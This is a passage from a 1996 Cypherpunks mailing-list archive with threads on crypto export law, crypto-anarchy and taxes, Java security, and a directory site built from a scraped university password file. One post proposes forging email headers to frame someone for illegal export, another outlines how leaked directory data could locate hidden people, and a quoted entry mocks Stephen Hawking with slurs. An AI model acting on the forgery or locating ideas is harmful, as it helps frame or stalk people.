>such modifications" to the interface, it is either an outright lie, or
>something that only happens after so much delay that they might as
>well not give you such permission.

The problem is that only RSA Labs (not RSA Data Security) can offer this
permission (as they have all the non-commercial rights) and they are not
set up to handle such requests.

I'll see what I can do as the commercial licensee to influence making this
happen. RSAREF was released "to support standards" and SSH is a beginning
of a standard, so I think it should be possible.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "JavaOne" <Javaone@sbexpos.com>
Date: Sun, 28 Apr 1996 10:42:41 +0800
To: cypherpunks@toad.com
Subject: You're Invited
Message-ID: <199604271833.LAA06983@well.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lou Zirko" <lzirko@isdn.net>
Date: Sun, 28 Apr 1996 07:07:40 +0800
To: merriman@arn.net>
Subject: Re: Click here to become an International Arms Trafficker
Message-ID: <199604271643.LAA03312@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


# 37

> At 02:46 PM 04/26/96 -0400, Vince Cate wrote:
> >
> >   "Click here to become an International Arms Trafficker"
> >

> 
> Well, I'm ITAR violator # 6 :-)
> 
> Dave Merriman
> -------------------------------------------------------------
> "Giving money and power to government is like giving 
> whiskey and car keys to teenage boys."
>                     P. J. O'Rourke (b. 1947), U.S. journalist.
> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
> http://www.shellback.com/personal/merriman/index.htm
> 
> 
> 
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzFseHQAAAEH/2gtDJSlsDvTo7m+Caj5zKuLO4dVl6L9e4xxFOAqKMtkHDIh
2z6NqqGnAKDai3eDXInBuOTGoyb82pkV7wD7naQDx7bppfwmJNguOPvlrErOZHcA
NbAkyXCoKHgDxeXLq0MMcyC8+kBxYNKhMPm17g7tny4DKD+fzat4k3UiSAves6Y7
jLgQwwQ7TLYIGg7iPAsbMTnOF5iP51Ib47Ozjb3suJvJjUOTSUdl4V3e9EHWiniH
G6kI1cfOdUmLXIgNZ34utTwwb2H/LhEDYrydmXJG6FfUolAThCwCbTG++Hq7/Ywr
BOawFj3BhySTvpp/bSCJt1Mz/eELEq9xwQCaVD0ABRG0G0xvdSBaaXJrbyA8bHpp
cmtvQGlzZG4ubmV0PokBFQMFEDFsfBcSr3HBAJpUPQEBRHoH/R+rkuMa9Vw+Civd
5QQM0tBMEPDUa7G2qNLKO0FBmVHoqq+VGeD9X2X+EBld0AwuWvshQfsViG2uBNxk
Cr44y+Q0tXByCZqR8snTZG12BtFaCZv51XVieo2ygWQdmNp5DyMEyIOXUByORT2m
2Jx2VngcFt5rpzZLRALqwBDkV00Xcm8MPQzqGq8ZQA3nmExQkdpnSJIJX0irWjDM
OueDrn9mBz2NwIZmddShYGUdhRXgpLYPHLMpo2fxE0dXiWkaDlyx47k4MIWaDoF4
nnTXxmEcS98AkT2PfqU4dT3UfZpZnHqkWQ7d4JqvXs9RmmH9K/NyBB+LykOvA1/t
W6deAaWJAJUDBRAxbHtD30Eh39zrXZUBAYPsA/0dIEjlSuc8wrX5KJzAhXqUKBbg
e3toQJk8RZwm4f80SC2DopEXYdmwAVrhOou7vezeu29mYVunKaDKg5xjnUfVR1WS
ZXy54ZfYEG4Zrdi4vJgydb96AwoF3VAYyAbV45XBTfy3ujZjZRxpZS96X7iKk+6l
quslrTmMFLhju4vWKw==
=wksf
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lou Zirko" <lzirko@isdn.net>
Date: Sun, 28 Apr 1996 06:38:09 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhosWhere.com selling access to my employer's passwd fi
Message-ID: <199604271650.LAA03361@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


DNS lookups fail currently for www.whoswhere.com and whoswhere.com.  
Gee, this is quick work.  Who are those masked men, opps lawyers?

> Date:          Sat, 27 Apr 1996 02:12:20 -0700
> From:          rich@c2.org (Rich Graves)
> To:            cypherpunks@toad.com
> Subject:       www.WhosWhere.com selling access to my employer's passwd file
> Organization:  Uncensored Internet, http://www.c2.org/uncensored/

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> If you are involved with the affairs of a large organization, I urge you
> to check www.whoswhere.com to see if they have a bunch of user email
> addresses that they shouldn't.
> 
> Of course there is little that one can do about this kind of invasion of
> privacy. But they don't have to be so fucking blatant and stupid about it.
> They have the email addresses of DAEMONS from our password files in their
> database.
> 
> There is no need for mailbombing, or anything like that. Our lawyers are
> simply going to nuke them from orbit. Please check them out before they go
> offline, so that you will have a shot at whatever is left.
> 
> - -rich
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMYHku43DXUbM57SdAQGQpwP/U9TzWE2vEjHYZo4eniVctFe3pVe0KIQe
> FvdNOWTykqfgEyhagKuifmRwUgjjIcIZONzRDw1Hi7UrJbOghH3j9sW5wxsphbxU
> 3U0hHuKumAczUHn03IVkkF4JpobawEgHqqP1Y++PhNopAvqnVSu+hnf5aIS1R390
> MlUiwpoo0OE=
> =+Mm2
> -----END PGP SIGNATURE-----
> 
> 
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzFseHQAAAEH/2gtDJSlsDvTo7m+Caj5zKuLO4dVl6L9e4xxFOAqKMtkHDIh
2z6NqqGnAKDai3eDXInBuOTGoyb82pkV7wD7naQDx7bppfwmJNguOPvlrErOZHcA
NbAkyXCoKHgDxeXLq0MMcyC8+kBxYNKhMPm17g7tny4DKD+fzat4k3UiSAves6Y7
jLgQwwQ7TLYIGg7iPAsbMTnOF5iP51Ib47Ozjb3suJvJjUOTSUdl4V3e9EHWiniH
G6kI1cfOdUmLXIgNZ34utTwwb2H/LhEDYrydmXJG6FfUolAThCwCbTG++Hq7/Ywr
BOawFj3BhySTvpp/bSCJt1Mz/eELEq9xwQCaVD0ABRG0G0xvdSBaaXJrbyA8bHpp
cmtvQGlzZG4ubmV0PokBFQMFEDFsfBcSr3HBAJpUPQEBRHoH/R+rkuMa9Vw+Civd
5QQM0tBMEPDUa7G2qNLKO0FBmVHoqq+VGeD9X2X+EBld0AwuWvshQfsViG2uBNxk
Cr44y+Q0tXByCZqR8snTZG12BtFaCZv51XVieo2ygWQdmNp5DyMEyIOXUByORT2m
2Jx2VngcFt5rpzZLRALqwBDkV00Xcm8MPQzqGq8ZQA3nmExQkdpnSJIJX0irWjDM
OueDrn9mBz2NwIZmddShYGUdhRXgpLYPHLMpo2fxE0dXiWkaDlyx47k4MIWaDoF4
nnTXxmEcS98AkT2PfqU4dT3UfZpZnHqkWQ7d4JqvXs9RmmH9K/NyBB+LykOvA1/t
W6deAaWJAJUDBRAxbHtD30Eh39zrXZUBAYPsA/0dIEjlSuc8wrX5KJzAhXqUKBbg
e3toQJk8RZwm4f80SC2DopEXYdmwAVrhOou7vezeu29mYVunKaDKg5xjnUfVR1WS
ZXy54ZfYEG4Zrdi4vJgydb96AwoF3VAYyAbV45XBTfy3ujZjZRxpZS96X7iKk+6l
quslrTmMFLhju4vWKw==
=wksf
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.segno.com
Date: Sun, 28 Apr 1996 12:24:26 +0800
To: cypherpunks@toad.com
Subject: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199604271611.AA05770@october.segno.com>
MIME-Version: 1.0
Content-Type: text/plain


Please forgive what may be a stupid question, but I've been wondering
about this for a long time, and today I'm tired of wondering.

A consistent theme here is "crypto-anarchy", which appears to be
essentially the idea that widespread cryptography will make tax
collection impossible, bringing down governments.  I don't see how
this will work.  The logical flaw in this argument seems so obvious
(and at least some of the people who buy into it seem so obviously
intelligent), that I can't help but think I must be missing something.

Certainly the widespread use of cryptography will frustrate modern
systems of taxation, such as income taxes, sales taxes, etc., which
are based on the monitoring of financial transactions.  But these
systems are a mere flash in the pan; taxes existed, and governments
sustained themselves perfectly well, long before these systems arose.

Why then shouldn't we expect that modern governments, in the face of
widespread cryptography, will simply revert to more traditional (and
brutal) systems such as head taxes, land taxes, travel tolls, etc.?

					---  mkj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Sun, 28 Apr 1996 07:12:14 +0800
To: allyn@allyn.com (Mark Allyn 206-860-9454)
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <199604271430.HAA03553@mark.allyn.com>
Message-ID: <199604271642.MAA04605@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> They are gone now.
> 
> mark.allyn.com% lynx http://www.WhosWhere.com

% lynx -dump http://www.whowhere.com/

    [WhoWhere? Banner] 
   
   [Toolbar: Use hyperlinks at the bottom] 
   TELL US WHAT YOU THINK: The WhoWhere? Internet Survey
   
   Welcome to WhoWhere?, the largest Internet directory of email
   addresses from around the world. This free service is rapidly growing
   because so many of you Add Your Listing!
   [...]

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com            "Info-Puritan elitist crapola!!"
Systems Administrator / Webmaster, HYGNet             (pbeilard@direct.ca)
Rabbits on walls, no problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Sun, 28 Apr 1996 11:12:50 +0800
To: cypherpunks@toad.com
Subject: You are now an International Arms Trafficker (#1) ???
Message-ID: <Pine.SUN.3.91.960427130413.15899A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Yikes,

Tell me that conspiracy to break ITAR isn't grounds for becoming
arms trafficker #1

I don't even have the latest version of the shortened Perl-RSA 
code back from the screenprinters.
 
Coming Soon! New fashionable Perl-RSA shirts!

You are now an International Arms Trafficker
 
 Thanks for the munitions package.
 
 You are trafficker number: 1
 
 Offshore Information Services Ltd.


-William Knowles
 erehwon@c2.org

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Apr 1996 12:47:47 +0800
To: cypherpunks@toad.com
Subject: "A Closer Look"
Message-ID: <m0uDIAr-000900C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


April 22, 1996  Electronic Buyers News,  Page 2.   A Closer Look column, by 
Jack Robertson

"bigbrother.com"

Orwell would have loved it.  National tyrants are helpless to control the 
free flow of information within their borders.  And if they do succeed in 
closing down ramps to the global data superhighway, their economies crumble.

Not that some folks aren't trying to rein in the Internet.

Strong-arm governments--including China, Vietnam, Singapore, and some 
African military dictatorships--want to control domestic access to the Net.  
Even democracies such as Germany want to censor the Web, and the European 
Union is debating regulation of it.

The United States itself could end up trying to control the Net in 
well-intentioned but dubious efforts to censor content deemed obscene.  The 
censor's club could be provided unwittingly by the movie industry and by 
consumer-electronics manufacturers.  Their rigid copyright protection plan 
for DVD would require that every computer I/O interface be designed to block 
out the copying of any copyrighted motion picture.  Once in place, others 
could sieze the I/O block to bar access to any content thought to be 
objectionable.

Uncle Sam could also end up giving ammunition to Internet censors in a 
yet-to-be-released proposal to the G-7 economic powers pertaining to 
copyright protection on the Internet.  The Clinton administration will 
submit the plan to the next G-7 conference in Lyon, France, in late June.  
The administration's earlier copyright plan for the U.S. National 
Information Infrastructure has stirred plenty of controversy in th is 
country over its potential shackling of the free flow of information.

So far, the unruly and ubiquitous Internet has defied almost all restraints. 
 Governments, businesses, politically correct factions can't get their arms 
around this amorphous giant.

Stalin could jam out the BBC and the Voice of America.  Iran can bar 
newspapers and periodicals.  Singapore can threaten judicial to try to keep 
the press in line.  But how do you cordon off the Web?  Some regimes 
envision their own national gateways to control Net traffic acrosss their 
borders.   Fat chance.  Even if police states could build an Internet 
firewall, it would take the resources of a National Security Agency to 
monitor the traffic and ferret out noxious communications.

In a first thrust to control electronic data, China is regulating all 
foreign news services through its Xinhua News Agency.  That way, Big Brother 
can lower the boom wherever a central node can be hit.  

But the anarchical Internet has no central control points--In fact, very 
little control at all.  A grassroots paradigm, the Net is a totally free 
democratic voice.

Like it or not, we need to keep it that way.

[end of article.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sun, 28 Apr 1996 12:41:48 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <v02140b01ada85707e260@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes:
> Scott Brickner writes:
> > True.  It's still lacking a couple of (non-language) features.  The
> > most important (and most cpunks relevant) is a mechanism to pay people
> > to run programs for you.  This sort of thing is dangerous without a
> > safe environment.

This is not as far away as you might think.  Trust me... :)

> You can do that safely without making it dangerous for your machine. I
> know how I would build a restricted execution environment for such
> markets. However, Java is 1) too slow, since if you are selling
> rendering cycles or such you don't want to be running an interpreter,
> 2) insufficently safe, and 3) paradoxically, insufficiently powerful
> for the sort of code you would want to run in such an environment.

Wow, three incorrect assumption in a single sentence, another hat-trick for
Perry.  Speed of execution is not a major problem given JIT compiler and
interpreter improvements; this has been broadcast far and wide on the net
so your presumed ignorance of this is a bit hard to believe.  Additionally,
if you are buying cycles off the net you can set things up to run in
parallel and accomplish more than you ever could without the ability. To
farm out code.  This is absolutely trivial when it comes to tasks which
are inherently easy to break into chunks which can be run in this fashion
(like rendering and ray-tracing, etc.)  As far as safety goes there are a
lot of people working on this problem and for tasks of this type it is not
as difficult as you assume.  As far as it being insufficiently powerful for
running distributed computation and cycle serving I know know for a fact
that this is not the case.

Rather than trying (and often failing) to prove that unsolvable problems
exist in Java why don't you present the net with an alternative that does
not suffer from these limitations.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 28 Apr 1996 14:47:04 +0800
To: perry@piermont.com
Subject: Re: The Joy of Java
In-Reply-To: <199604270123.VAA01708@jekyll.piermont.com>
Message-ID: <199604272232.PAA00806@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes: 

  You can do that safely without making it dangerous for your machine. I
  know how I would build a restricted execution environment for such
  markets. However, Java is 1) too slow, since if you are selling rendering
  cycles or such you don't want to be running an interpreter, 2)
  insufficently safe, and 3) paradoxically, insufficiently powerful for the
  sort of code you would want to run in such an environment. 

What solution is fast enough and safe enough and powerful enough?  Does
such a solution exist?  I say, No, it doesn't.  So let's quit pretending
that the Holy Grail exists, and get back to engineering. 

But let's not have a food fight.  Although entertaining in the short term,
food fights are actually deathly boring and incredibly unfruitful in the
long term.  I'm interested in helping people do interesting things in a
reasonably secure way, on the internet, using Java.  We're working on a
response to the Felten el al. paper, which will be posted to the net
shortly.  I think some of their points are perfectly valid, some of their
points are irrelevant, and a lot of the presentation is melodramatic. 
Melodrama is good for sound bites, I guess. 

Marianne
working on Java security stuff at Sun






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 28 Apr 1996 12:32:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Joy of Java
In-Reply-To: <ada5c3312c021004e096@[205.199.118.202]>
Message-ID: <199604272244.PAA01728@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Why is everybody so into declaring who the winner is and who the loser is,
instead of just implementing some useful program on the internet using
"your favorite langues?" 

Maybe it's a gender thang.   You boys are into talk, huh.   :-) 

Marianne






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 28 Apr 1996 12:39:29 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.GUL.3.93.960424222517.22644F-100000@Networking.Stanford.EDU>
Message-ID: <199604272256.PAA02672@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


One thing I don't understand, why do you trust signed code? 

So you know the code is signed by Jack the Ripper.  so what?  How do 
decide what you want the code to be allowed to do?   I think there's 
nothing for it but a kind of limited capabilities model built on top
of the authentication mechanism. 

Marianne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 28 Apr 1996 13:42:09 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199604271611.AA05770@october.segno.com>
Message-ID: <Pine.SUN.3.91.960427153644.3252A-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 27 Apr 1996 mkj@october.segno.com wrote:

> ...
> Certainly the widespread use of cryptography will frustrate modern
> systems of taxation, such as **income taxes**, sales taxes, etc., 
	[emphasis added]

Income tax is the Godzilla of taxes.  It is THE TAX when it comes
to the US.  (Perhaps VAT has a similar status elsewhere, but both,
as pointed out, are subject to crypto-anarchistic subversion.)

> ...taxes existed, and governments sustained themselves perfectly
> well, long before these systems arose.

But at nowhere near the voracious levels of modern states.

> Why then shouldn't we expect that modern governments, in the face of
> widespread cryptography, will simply revert to more traditional (and
> brutal) systems such as head taxes, land taxes, travel tolls, etc.?

For the same reasons they were dropped in the past.  They have
only a limited ability to extract tribute from a defenseless
populace.  Today's citizens have far more power vis-a-vis the
state, and far less deference for authority.

HEAD TAX--This "regressive" tax would really piss off those on
the lower end of the economic ladder if the price-per-head were
anywhere near what is needed maintain a government.  The amount
of social control needed to make sure most people had complied
would be beyond anything a modern state could field.

LAND TAX--Might be better than a head tax, but the unintended
affects would still piss off the poor.  It would give the 
relatively few land owners enormous motivation to buy off 
assessors and, ultimately, higher government officials.  To
the extent land taxes could be collected, they would be 
enormously economically destructive.  The net effect would be
similar to Soviet collectivisation.  The land, the productive
base of a nation's economic health would be constantly eroded
until everyone was impoverished.

TRAVEL TOLLS--Yeah, right.  The Soviets required VISAS, to 
travel between cities, yet they couldn't even stop students 
from taking unauthorized jaunts.

The MODERN state is doomed and, thanks to technology, the people 
have too much power to permit more "traditional" governments to
control them.  States may not go quietly into that gentle night,
their death throes may be very bloody, but go they will.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 28 Apr 1996 10:52:42 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Cell Kill 2
In-Reply-To: <199604271127.HAA17044@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.93.960427160915.21860A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, John Young wrote:

>    4-27-96 NYT op-ed claims:
> 
>       On April 21, two Russian laser-guided missiles

People really need to understand their technology before they write stuff
like this.

>       reportedly zeroed in on the cellular phone of Dzhokhar
>       M. Dudayev, leader of the Chechen rebels, and killed
>       him.
> 
>       According to the Russian newspaper Izvestia, Mr. Dudayev
>       died while phoning an aide to King Hassan II of Morocco,
>       who had been asked by President Yeltsin to help mediate
>       an end to the war. Will any leader ever again be so
>       gullible?
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Apr 1996 14:09:33 +0800
To: William Knowles <cypherpunks@toad.com
Subject: Re: You are now an International Arms Trafficker (#1) ???
Message-ID: <m0uDJCd-0008xTC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 PM 4/27/96 -0700, William Knowles wrote:
>Yikes,
>
>Tell me that conspiracy to break ITAR isn't grounds for becoming
>arms trafficker #1
>
>I don't even have the latest version of the shortened Perl-RSA 
>code back from the screenprinters.

I thought of a method of exporting encryption code that doesn't require an 
export license, but better yet makes some _deserving_ soul a criminal.   (In 
hindsight, it seems obvious, although I don't recall seeing it discussed.)

Basically, you take advantage of the fact that on the Internet, 
incorrectly-addressed email is often/usually returned to what appears to be 
the sender.  For example, send PGP source, split into appropriately-sized 
chumks, to somebody like   bigshot@nsa.com.    Mis-spell his name, of 
course, and forge the note so that it appears to be coming from some 
out-of-country address.  His ISP's system's email software sees the bad address, 
"returns" it, and it's sent to that out-of-US location.  Keep the messages 
as evidence; forward them to the appropriate prosecutor, who is stuck 
between a rock and a hard place:  Either he prosecutes a "good guy," or he 
fails to prosecute an unauthorized encryption exporter and thus sets up a 
bad precedent.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 14:09:07 +0800
To: Marianne Mueller <mrm@netcom.com>
Subject: Re: Mindshare and Java
In-Reply-To: <199604272256.PAA02672@netcom20.netcom.com>
Message-ID: <Pine.GUL.3.93.960427162243.9454C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Marianne Mueller wrote:

> One thing I don't understand, why do you trust signed code? 
> 
> So you know the code is signed by Jack the Ripper.  so what?  How do 
> decide what you want the code to be allowed to do?   I think there's 
> nothing for it but a kind of limited capabilities model built on top
> of the authentication mechanism. 

I explained/retracted/fudged this in a later message.

Some of the things a valid signature from Jack the Ripper means: 

1. If it breaks something, I can send Jack the Ripper a bug report, or
   a flame, as appropriate.
2. If I like it, I can send Jack the Ripper money or other form of good
   vibes.
3. If I am Jack the Ripper, I have a way of proving that the code is my
   intellectual property.
4. If I'm not Jack the Ripper, I can say "That wasn't me."
5. If I am GNU, I can advertise and "enforce" my copyleft policy.
6. I have a way of knowing if Alice or Bob stuck a virus or trojan into
   Jack's code.

"Trust" really isn't the right word for what I'm getting at. Microsoft's
digital signature initiative is basically FUD with the spin "Only stuff
signed or endorsed by Microsoft is going to work," but I don't think that
this spin is inherent in signed code initiatives generally.

I think it would be a waste of time to build a multitiered security model
where applets with certain classes of signatures would be allowed to do
more. But signatures are still useful in a flat security model.

I think this is already all being done for Java, though, so never mind,
probably. I was just responding in a generally applicable way.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Sun, 28 Apr 1996 14:52:44 +0800
To: cypherpunks@toad.com
Subject: Internet Police Law (fwd)
Message-ID: <2.2.16.19960427165636.403fce62@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


This seems to be an interesting developement in GA... With CP relevance.

>It is being dubbed the Internet Police Law.  Georgia's state government is
>beginning to catch a little net-heat because of a new law signed by the
>Governor last week which, according to some, CRIMINALIZES the use of e-mail
>addresses which don't properly identify a person, as well as the practice of
>linking to another web page by name without first obtaining permission to
>link.  
>
>If anyone cares to see information and commentary on this new law, feel free
>to browse over to www.kuesterlaw.com.  I would love to know what everyone
>thinks about the constitutionality of this bill, as well as any other comments.
>
>Thanks.
>jk
>Jeffrey R. Kuester, Esq.         Patent, Copyright, & Trademark Law
>6445 Powers Ferry Road, Suite 230, Atlanta, Georgia 30339
>Ph (770) 951-2623  Fax (770) 612-9713
>E-mail: kuester@kuesterlaw.com
>WWW: http://www.KUESTERLAW.com   (The Technology Law Resource)

-- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
| My PGP key is available on my  |Unauthorized interception violates |
| home page: http://www.rosa.com |federal law (18 USC Section 2700 et|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...see home page...     |communications are preferred for   | 
|     -=[ FUCK THE CDA]=-        |sensitive materials.               |
\=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
If A is a success in life, then A = x + y + z. Work is x; y is play; 
and z is keeping your mouth shut. Albert Einstein (1879-1955)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 13:47:08 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.SUN.3.93.960427191953.24829F-100000@polaris.mindport.net>
Message-ID: <Pine.GUL.3.93.960427163753.9454D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Black Unicorn wrote:

> On Sat, 27 Apr 1996, Sentiono Leowinata wrote:
> 
> 
> > I wonder how they can get the e-mail address? Our finger daemon are
> > blocked. Many un-broadcast e-mail addresses (the account never send any
> > e-mails to anyone) are in the database. How?
> > Furthermore, isn't it also privacy invasion?
> > Would any hackers or expert people kindly to tell me how to block
> > further threat like this?
> 
> Use a nym.

This doesn't necessarily help if you work or study at a large institution
(stanford.edu, for example). It depends on what you want to keep private. 
If I want to moonlight or carry on a political discussion, I can use
untraceable nyms, but if someone wants to know where Rich Graves works,
then there is no way for me to stop them from finding out. That's not a
problem for me, obviously, but I've got 30,000 other people to worry
about.

What whowhere.com did (whoswhere was a typo, yes -- it was late, and I was
rather pissed off) was grab the password file some time ago. We know that
they grabbed the password file because they have misspellings, odd
capitalizations, and daemon/group IDs that appear *only* in the password
file.  We know exactly when they did it, because the password file is
built sequentially. They have everything up to line 26,667, and nothing
after that line. We know exactly when account 26,668 was opened.

Search for "SITN Account" at organization "stanford.edu". These are
kerberos IDs that have never had email addresses. They have never existed
outside the password file.

They also have password files from a few other large educational and
commercial organizations. It is not clear that they broke the law getting
our password file, but in at least two other cases, it is.

The threat profile is this. We've got grad students and visiting lecturers
from repressive countries, or good-guy countries threatened by terrorists.
We've got some really famous people who don't want to be stalked.  These
people have unlisted phone numbers, unlisted email addresses, unlisted
physical addresses, and if you call the registrar for a transcript, the
registrar will neither confirm nor deny that Stanford has ever heard of
such a person. If you finger @stanford.edu, these people will never show
up, no matter how you formulate the query. They're simply not in any
directory database.

If you grep one of the files that whowhere.com OBVIOUSLY used to build its
database, some of these people do show up. If you then finger that address
specifically, you might get the last login time and location, which might
tell you exactly where they live and work on campus. You can then send a
package with excessive postage, or something like that.

Never mind women (or men) being stalked by sticky-fingered psychopaths.
One person's paranoia is another person's reality.

In a way, I suppose we're "asking for it," because anyone with a
reasonable level of technical knowledge would know that the password file
the whowhere.com guys took is vulnerable, but the users who are now in a
public directory without their knowledge or consent were NOT asking for
it. Since the fact that they're at Stanford is one of the things some of
them might want to keep secret, there is no satisfactory compromise short
of removing all names and addresses collected in such unethical ways.

whowhere.com is in Mountain View; its principals live in Palo Alto, a
ten-minute bike ride from campus. If some (former) Stanford affiliate
helped them out, they're in trouble. If some (former) Stanford affiliate
didn't help them out, then they're in a lot more trouble.

They also have an entry for me as "Dick Graves - CDA Investigator." I
believe I used this in the From: line of two posts to su.* newsgroups that
do not propagate beyond nntp.stanford.edu. The presence of this address
means that they were building their database on Stanford computers, which
is a big, big no-no.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 28 Apr 1996 12:48:52 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.OSF.3.91.960427180844.11803B-100000@bud.peinet.pe.ca>
Message-ID: <199604272318.RAA08172@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



I looked up Stephen Hawking in their "database". The appalling result:


>    Name: Stephen Hawking
>             E-mail: retard@dribble.net
>       Last Updated: Mar '96
>            Address: 1, Crip Street
>                     Cambridge
>                     Disabled
>                     UK
>              Phone: 
>                URL: http://www.damtp.cam.ac.uk/DAMTP/user/hawking/
>
>       Message: Ngghhh ngghy mmmfffgffff ngggnnhghh


Sign me up for the IPO...


                                   -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 28 Apr 1996 11:30:23 +0800
To: cypherpunks@toad.com
Subject: Re: Cell Kill 2
In-Reply-To: <Pine.SUN.3.93.960427160915.21860A-100000@polaris.mindport.net>
Message-ID: <9Bc3mD213w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> >       According to the Russian newspaper Izvestia, Mr. Dudayev
> >       died while phoning an aide to King Hassan II of Morocco,
> >       who had been asked by President Yeltsin to help mediate
> >       an end to the war. Will any leader ever again be so
> >       gullible?

According to some Usenet articles I saw, Dudaev died while talking on the phone
with the Russian Duma deputy Konstantin Borovoy. I think I used to exchange a
